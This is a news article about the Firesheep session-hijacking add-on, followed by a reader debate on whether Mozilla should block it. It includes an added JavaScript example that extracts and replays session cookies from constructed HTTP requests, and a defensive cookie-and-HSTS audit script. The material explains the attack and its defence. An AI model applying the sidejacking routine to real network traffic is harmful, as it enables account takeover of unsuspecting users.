Should Mozilla block Firesheep?

Firesheep is a new, free Firefox add-on that makes it a snap for anyone to scan a WiFi network and hijack other people's Facebook, Twitter and other online accounts.

Firesheep was developed by Seattle web app developer Eric Butler and released over the weekend at the ToorCon security conference. Butler says the purpose of Firesheep is to get websites to tighten up their security:

It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.

This is a widely known problem that has been talked about to death, yet very popular websites continue to fail at protecting their users. The only effective fix for this problem is full end-to-end encryption, known on the web as HTTPS or SSL. Facebook is constantly rolling out new "privacy" features in an endless attempt to quell the screams of unhappy users, but what's the point when someone can just take over an account entirely? Twitter forced all third party developers to use OAuth then immediately released (and promoted) a new version of their insecure website. When it comes to user privacy, SSL is the elephant in the room.

The add-on is incredibly easy to use. Download it, connect to an open WiFi network and click a single button. The add-on starts capturing session cookies from the plaintext HTTP traffic it sees, displaying user names and photos in the sidebar. To log in to a site as a particular user, just double-click on their name and you're in as them. Note that it never needs the victim's password: the cookie that the site issued after login is all it takes.

It's very, very easy. And very, very scary.

Firesheep can capture session cookies for many big sites such as Facebook, Twitter, Flickr, bit.ly, Google and Amazon.
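To make concrete what "capturing session cookies" means, here is an added example (my own illustration, not Firesheep's code) of the sidejacking step. It follows Firesheep's general design of per-site handlers that know which cookie names make up a login session. The two captured requests, the hostnames and the cookie names are all constructed for the example and do not correspond to any real site.

```javascript
// Added example, not Firesheep's own code: how HTTP session sidejacking works.
// A passive sniffer on an open WiFi network sees every plaintext HTTP request.
// Each request carries the victim's cookies; a per-site handler knows which
// cookie names hold the session, and replaying them logs the attacker in.

// Constructed sample of what a sniffer would see: three plaintext requests
// captured off the air. Hosts, paths and cookie values are made up.
const CAPTURED_REQUESTS = [
  "GET /home.php HTTP/1.1\r\n" +
    "Host: www.example-social.test\r\n" +
    "User-Agent: Mozilla/5.0\r\n" +
    "Cookie: locale=en_US; sess_id=a8f3c0d9e1b2; tracking=xyz\r\n" +
    "\r\n",
  "GET /feed HTTP/1.1\r\n" +
    "Host: www.example-micro.test\r\n" +
    "Cookie: _auth_token=9c1d2e3f; theme=dark\r\n" +
    "\r\n",
  // A logged-out visitor: no session cookie, nothing to hijack.
  "GET / HTTP/1.1\r\n" +
    "Host: www.example-social.test\r\n" +
    "Cookie: locale=en_US\r\n" +
    "\r\n",
];

// Per-site handlers: a hostname pattern plus the cookie names that together
// form the login session. Hypothetical sites, not real handler definitions.
const HANDLERS = [
  { name: "ExampleSocial", hostPattern: /(^|\.)example-social\.test$/, cookieNames: ["sess_id"] },
  { name: "ExampleMicro", hostPattern: /(^|\.)example-micro\.test$/, cookieNames: ["_auth_token"] },
];

// Parse the request line and headers of one plaintext HTTP request.
function parseHttpRequest(raw) {
  const [head] = raw.split("\r\n\r\n");
  const lines = head.split("\r\n");
  const [method, path] = lines[0].split(" ");
  const headers = {};
  for (const line of lines.slice(1)) {
    const idx = line.indexOf(":");
    if (idx === -1) continue;
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  return { method, path, headers };
}

// Turn "a=1; b=2" into { a: "1", b: "2" }.
function parseCookieHeader(value) {
  const jar = {};
  for (const part of (value || "").split(";")) {
    const idx = part.indexOf("=");
    if (idx === -1) continue;
    jar[part.slice(0, idx).trim()] = part.slice(idx + 1).trim();
  }
  return jar;
}

// The sidejack step: match the host to a handler and pull out the session
// cookies. Returns null when the request carries no complete session for a
// known site, so logged-out traffic and unknown hosts are ignored.
function sidejack(raw) {
  const req = parseHttpRequest(raw);
  const host = req.headers["host"] || "";
  const jar = parseCookieHeader(req.headers["cookie"]);
  for (const h of HANDLERS) {
    if (!h.hostPattern.test(host)) continue;
    if (!h.cookieNames.every((n) => n in jar)) continue;
    const session = Object.fromEntries(h.cookieNames.map((n) => [n, jar[n]]));
    return { site: h.name, host, session };
  }
  return null;
}

// The Cookie header an attacker replays to act as the victim.
function replayCookieHeader(session) {
  return Object.entries(session).map(([k, v]) => `${k}=${v}`).join("; ");
}

function hijackAll(captures) {
  return captures.map(sidejack).filter(Boolean);
}

// Stand-alone run: one line per hijacked session.
for (const hit of hijackAll(CAPTURED_REQUESTS)) {
  console.log(`${hit.site} (${hit.host}): Cookie: ${replayCookieHeader(hit.session)}`);
}
```

Everything the attacker needs is in the `Cookie` header; no decryption or password guessing is involved, which is why the only fix is to keep that header off the plaintext channel altogether.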

Firesheep is free and open source and works on Mac OS X and Windows (Linux support is on the way).

Now, Firesheep is an add-on for the Firefox browser, and Mozilla has a blocklist mechanism that can be used to remotely disable an add-on. But Mozilla's director of Firefox, Mike Beltzner, has said that Mozilla will not activate the kill-switch in this case because Firesheep doesn't exploit a vulnerability in the browser itself.

Talkback

51 comments
  • Then block these as well ...

    The SQL Inject Me and XSS Me add-ons should be blocked as well.
    cappella
  • Surprised at results of poll

    So far 61% saying no.

    I voted the other way because the point has been made, security needs to be improved, so shut it down. Too many people use the same passwords for all their accounts - banks included and they are at real risk.

    This kind of publicity of vulnerability helps build awareness but people are slow to change. I'm working with a company that has a Firefox plug-in that protects people with SSL encryption and a bunch of other security features. Even though it's free right now, I have many friends unwilling to even try it, because they don't want to deal with change. If you want to be a beta tester try it here www.getCocoon.com and let us know what you think. Thanks! DavidKris
    Davidkris2
    • RE: Should Mozilla block Firesheep?

      @Davidkris2 Any Chrome extension in the future? Looks interesting... but I like Chrome... but would try this out, since I still use Firefox from time to time.
      zaghy2zy
    • RE: Should Mozilla block Firesheep?

      @Davidkris2
      Are you really that naive to think the normal user has any idea about this exploit? If they did they would have secured their wireless network. The ONLY people who know about this are criminals, blackhat hackers and the people who keep up on technology.
      As far as your plugin: why should anyone trust you and your software? We can't even trust companies like Adobe, Apple, MS, and the list goes on.
      Stan57
      • RE: Should Mozilla block Firesheep?

        @Stan57

        The normal user needs to get more damned tech savvy, to be blunt. If my FATHER who is nearly 61 years old now could tell me "Please secure my wireless network!" when we got it.... ANYONE can.
        Lerianis10
      • RE: Should Mozilla block Firesheep?

        @Lerianis10
        Welcome to the real world.
        use_what_works_4_U
    • I agree

      @Davidkris2 Yes, Firefox is directly helping keep a plugin active that is obviously used to harvest personal information from other Firefox users. You would think people would be concerned? Obviously from the poll, people are more concerned about open browsing. Well, good luck with that.
      jscott418-22447200638980614791982928182376
    • RE: Should Mozilla block Firesheep?

      @Davidkris2

      I don't recall any of the articles saying it could hijack the actual password, just the already authenticated cookie that is used as a session token...
      erik.soderquist
      • RE: Should Mozilla block Firesheep?

        @erik.soderquist By getting the cookie they can then change your password. Or they can change the email to theirs and then do a "forgot my password".
        Now, does making the site only use HTTPS block this?
        sysop-dr
      • RE: Should Mozilla block Firesheep?

        @sysop-dr

        I've yet to see any site that doesn't require entry of the old password to change the password. However, I've always advocated encrypting any and all authenticated communications.

        Yes, using HTTPS exclusively for all authenticated requests/responses would block those, as the cookie needed for this exploit would be in the encrypted channel and therefore require breaking the encryption to get it.

        (note: I am not on Facebook/Twitter/etc., so I can't say either way if they require the old password on the change password form)

        -- edit to correct spelling and complete thoughts
        erik.soderquist
      • RE: Should Mozilla block Firesheep?

        @erik.soderquist

        "I've yet to see any site that doesn't require entry of the old password to change the password."

        Even when, like, sysop-dr said, you click on forgot my password? That's a pretty terrible system; to have to put in the password that you can't find in order to change your password.

        Möbius loop, anyone?
        PlayFair
      • RE: Should Mozilla block Firesheep?

        @PlayFair

        The sites I am on (banking, credit card, etc.) all require the current password to change the contact email, security questions, etc., or a call to customer care to prove you are you over the phone.

        As I said earlier, I can't speak to Facebook/Twitter/etc. as I am not on them. If their security structure is weaker, that is another black mark against them.
        erik.soderquist
    • Anyone who releases something like this into the wild

      and tells you he is doing it for the "common good," is a lying snake. The guy's a slime. Period. Find him and prosecute him.
      frgough
      • Why?

        @frgough
        Why prosecute him? He's not the one that broadcast the data on an unsecured network (which in many states is now illegal to have an unsecured open wireless network).

        On top of that, he's made the point, but the thing you apparently fail to realize is that companies NEVER change unless there's money actively being lost. So, until they start losing money, they won't fix the problem and his point will just fade into the background, being largely ignored.

        It's sad he has to do this to make a point, but businesses are greedy/lazy that way.
        Zorched
      • RE: Should Mozilla block Firesheep?

        @Zorched

        well said

        And he, among many others, has been saying that HTTPS needed to be used for this specific reason for years, and almost no one listened until this tool was released. Google was among the few that did change to HTTPS as default and then posted the CPU/memory usage data to prove it was not nearly the hit that 'conventional wisdom' makes it out to be.
        erik.soderquist
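The thread above asks whether serving the site only over HTTPS blocks the attack. It does block the sniffing of pages served over TLS, but a practitioner needs two more pieces, and the following added example (my own, not the article's or any commenter's code) shows why. A browser attaches a cookie to every request for the cookie's domain, plaintext `http://` ones included, unless the cookie was set with the `Secure` attribute; and without an HSTS header the browser will still make a first plaintext request whenever it is steered to an `http://` URL (a typed address, an old bookmark, an injected image tag on the open network). The header values and the minimal request object below are constructed for the example.

```javascript
// Added example: why "just use HTTPS" needs the Secure cookie flag and HSTS
// to actually stop sidejacking. Not code from the article or its commenters.

// Parse one Set-Cookie header into name, value and lowercase attributes.
function parseSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim());
  const eq = parts[0].indexOf("=");
  const cookie = { name: parts[0].slice(0, eq), value: parts[0].slice(eq + 1), attrs: {} };
  for (const p of parts.slice(1)) {
    const i = p.indexOf("=");
    const key = (i === -1 ? p : p.slice(0, i)).toLowerCase();
    cookie.attrs[key] = i === -1 ? true : p.slice(i + 1);
  }
  return cookie;
}

// The browser rule that makes the Secure flag matter: a cookie without it is
// sent on plaintext http:// requests too, where a sniffer can read it.
function browserWouldSend(cookie, scheme) {
  if (cookie.attrs["secure"] && scheme !== "https") return false;
  return true;
}

// Audit a login response. `responseHeaders` is a plain object keyed by
// lowercase header name. Returns a list of findings; empty means clean.
function auditSessionCookie(setCookieHeader, responseHeaders) {
  const c = parseSetCookie(setCookieHeader);
  const findings = [];
  if (!c.attrs["secure"]) {
    findings.push("session cookie lacks Secure: browser sends it over plaintext HTTP, sniffable on open WiFi");
  }
  if (!c.attrs["httponly"]) {
    findings.push("session cookie lacks HttpOnly: readable by script injected into any plaintext page");
  }
  if (!responseHeaders["strict-transport-security"]) {
    findings.push("no HSTS header: browser may still make a first plaintext request to this host");
  }
  return findings;
}

// Server side of the same rule: only honour a session that arrived over TLS,
// so a cookie that did leak onto plaintext is useless for replay over http://.
// `req` is a minimal constructed request: { secure: boolean, cookies: {...} }.
function sessionFromRequest(req, sessionCookieName) {
  if (!req.secure) return null;
  return req.cookies[sessionCookieName] || null;
}

// A site that "switched to HTTPS" but changed nothing else, beside the fix.
// Cookie name and value are hypothetical.
const WEAK_SET_COOKIE = "sess_id=a8f3c0d9e1b2; Path=/";
const WEAK_HEADERS = {};
const FIXED_SET_COOKIE = "sess_id=a8f3c0d9e1b2; Path=/; Secure; HttpOnly";
const FIXED_HEADERS = { "strict-transport-security": "max-age=31536000; includeSubDomains" };

// Stand-alone run: the weak configuration yields three findings, the fixed one none.
console.log("weak:", auditSessionCookie(WEAK_SET_COOKIE, WEAK_HEADERS));
console.log("fixed:", auditSessionCookie(FIXED_SET_COOKIE, FIXED_HEADERS));
```

The `Secure` flag is the part most often missed: it is what stops the browser itself from handing the cookie to the sniffer on the first `http://` request, and HSTS is what stops that request from being plaintext in the first place.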
  • Doesn't someone need to be actually

    logging on to a site from the WiFi connection at the time Firesheep is listening? It seems improbable that Firesheep can peek into someone's cookies if the cookies are not being used at the time.

    Anyone logging onto any password protected web site while using a public WiFi hot spot is an idiot and deserves to be burned...
    jacarter3
    • typical geek

      @jacarter3 your comment is the one of a typical geek who believes that everyone should know about technology.

      By saying what you've said, you've probably just burned your grandparents, your mother, and most of your potential partners.

      Leave that proud geek outside your skin and think as a human being, where each person has his own interests and they might not care about the same things as you.
      patibulo
      • RE: Should Mozilla block Firesheep?

        @patibulo

        He is thinking as a human being, just not a BRAINDEAD human being like you would wish him to think like.
        Lerianis10
    • RE: Should Mozilla block Firesheep?

      @jacarter3 How many of you dopes screaming about getting more tech savvy can actually perform all the mechanical work on your car? This is like saying that since you're going to press a gas pedal then you should be able to fix fuel injection. Yeah, right.
      ejhonda
      • RE: Should Mozilla block Firesheep?

        @ejhonda
        What jacarter3 said was very basic knowledge anyone who goes online should know, so I am not sure why anyone would call that geek knowledge. Me, I understand what he is saying as that's just very basic public knowledge. I also repair electronics, design web sites, rebuild engines and am a certified auto collision repair tech. I also was a carpenter for 15 years before the trades died, so not sure what point you're trying to make??
        Fletchguy